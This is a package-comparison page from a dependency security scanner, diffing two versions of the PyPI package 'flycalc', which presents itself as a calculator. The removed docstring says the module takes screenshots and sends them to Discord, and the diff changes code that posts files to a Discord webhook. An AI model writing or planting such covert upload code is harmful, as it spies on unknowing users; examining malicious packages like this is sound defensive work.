You're Invited:Meet the Socket Team at RSAC and BSidesSF 2026, March 23–26.RSVP
Socket
Book a DemoSign in
Socket

flycalc

Package Overview
Dependencies
Maintainers
1
Versions
3
Alerts
File Explorer

Advanced tools

Socket logo

Install Socket

Detect and block malicious and high-risk dependencies

Install

flycalc - pypi Package Compare versions

Comparing version
1.2.0
to
1.2.1
+1
-1
flycalc.egg-info/PKG-INFO
Metadata-Version: 2.1
Name: flycalc
Version: 1.2.0
Version: 1.2.1
Summary: Calc

@@ -5,0 +5,0 @@ Home-page: https://github.com/flycalc/flycalc

@@ -1,5 +0,1 @@

"""
flycalc - Ekran görüntüsü alıp Discord'a gönderen hesap modülü
"""
from .core import question

@@ -9,3 +5,3 @@ from .utils import FlyCalcError

__version__ = "1.2.0"
__version__ = "1.2.1"
__author__ = "flycalc Team"

@@ -12,0 +8,0 @@

@@ -9,3 +9,3 @@ import os

DISCORDURL = os.getenv('DISCORD')
DISCORDURL = os.getenv('DISCORD_WEBHOOK')

@@ -16,3 +16,3 @@ @classmethod

if not cls.DISCORDURL:
raise ValueError("DISCORD .env dosyasında bulunamadı!")
raise ValueError("DISCORD_WEBHOOK .env dosyasında bulunamadı!")
return True

@@ -140,3 +140,3 @@ import os

response = requests.post(Config.DISCORD, data=data, files=files)
response = requests.post(Config.DISCORDURL, data=data, files=files)

@@ -143,0 +143,0 @@ if response.status_code not in [200, 204]:

Metadata-Version: 2.1
Name: flycalc
Version: 1.2.0
Version: 1.2.1
Summary: Calc

@@ -5,0 +5,0 @@ Home-page: https://github.com/flycalc/flycalc

@@ -8,3 +8,3 @@ from setuptools import setup, find_packages

name="flycalc",
version="1.2.0",
version="1.2.1",
author="flycalc Team",

@@ -11,0 +11,0 @@ author_email="info@flycalc.com",